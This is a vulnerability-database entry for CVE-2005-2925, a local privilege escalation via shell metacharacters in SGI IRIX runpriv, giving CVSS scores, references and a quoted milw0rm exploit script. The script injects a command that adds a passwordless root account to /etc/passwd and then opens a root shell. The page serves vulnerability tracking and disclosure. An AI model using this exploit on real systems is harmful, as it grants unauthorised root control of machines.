Published: 12/10/2005 Updated: 19/10/2018

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 725

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

runpriv in SGI IRIX allows local users to bypass intended restrictions and execute arbitrary commands via shell metacharacters in a command line for a privileged binary in /usr/sysadm/privbin.

Vulnerable Product	Search on Vulmon	Subscribe to Product
sgi irix 6.5.22

#!/bin/sh # Advisory: wwwidefensecom/intelligence/vulnerabilities/displayphp?id=312 /usr/sysadm/bin/runpriv mountfs -s test -d / -o | "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" su r00t -c "chown root:sys /tmp/passwd123 ; mv /tmp/passwd123 /etc/passwd ; chmod 644 /etc/passwd ; su" # milw0rmcom [2005-10-10] ...

NVD-CWE-Other http://www.idefense.com/application/poi/display?id=312&type=vulnerabilities http://securitytracker.com/id?1015031 ftp://patches.sgi.com/support/free/security/advisories/20051001-01-P.asc http://www.securityfocus.com/bid/15055 http://secunia.com/advisories/17131 http://www.osvdb.org/19907 https://exchange.xforce.ibmcloud.com/vulnerabilities/22561 http://www.securityfocus.com/archive/1/427409/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/1577/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2005-2925

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect